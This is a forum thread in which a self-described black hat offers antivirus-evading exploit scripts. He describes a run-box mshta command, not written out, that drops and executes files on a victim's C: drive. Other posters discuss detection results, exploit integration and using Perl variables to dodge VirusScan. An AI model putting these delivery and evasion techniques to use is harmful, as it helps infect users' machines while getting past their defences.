Since this is a members-only section, would you guys be interested in seeing code for some of the exploit scripts I use? Currently I have one of them hosted on my website. It's generally been closed code because it gets past McAfee and I don't want kids using it "en masse" to infect computers, but I'm willing to share it with admins and security professionals that would like to see what a dedicated black hat might use to get through to your system.

To get an idea of how easy it is, go START->RUN and type:


You'll fine it copies an "e.vbs" and "test.exe" to your root c: drive and then executes the test.exe file which will open your cdrom. Yes, it is *that* simple and still *that* effective.

I'm also interested if KAV or Norton picks this up. My guess is KAV does, I haven't checked "VirusAll" to find out.

I knew about hta's but had never seen it used like that, cool

the firewall (outpost pro) warned me a few times (but that's not important)

the antivir (www.free-av.com) picked it up and reported it as being "BDS/Iwill.A.3"

didn't think you still had that running yorn... i remember that from early last year

yes i think your scripts would be of great interest mate... like you said it has passed several AV detection i tested it on

but i see from above there catching on to it now

I tried implementing that mshta into that HP WebJet Admin exploit. Skiddies dont delete mshta. But for some reason it just didn't worked. Still don't know why. When doing the same thing on a normal shell did work.

But, when normal echoing of vbs code doesn't work, that mshta thingy also doens't work. At least, that are my experiences with it.

Yes, this code is refined over time and has been customized by PERL variables. Essentially, the "a" "b" "c" variables in the visual basic code are representative of $A $B $C variables in PERL. So anyone can set $A = "slekjslkej" and it will still work. Great for duping VirusScan and others.

The reason why it is detected as an "Illwill" exploit is because I had originally released the code and he kept a copy of it on his website. At first I was a bit peeved, but he kept the text file I included, so I didn't mind. I might do some additional work on this in the very near future and release a version 3.

I realize that primarily this could be used by malicious individuals, but I don't see why an administrator or manager couldn't be shown that even a dedicated hacker can get around VirusScan with a little bit of work.

Hmm.. I'm thinking maybe I should look at alternatives to using echo to create a VBS to run. That leaves a trace (which most hackers do not do) and the echo portion causes confusion on certain systems.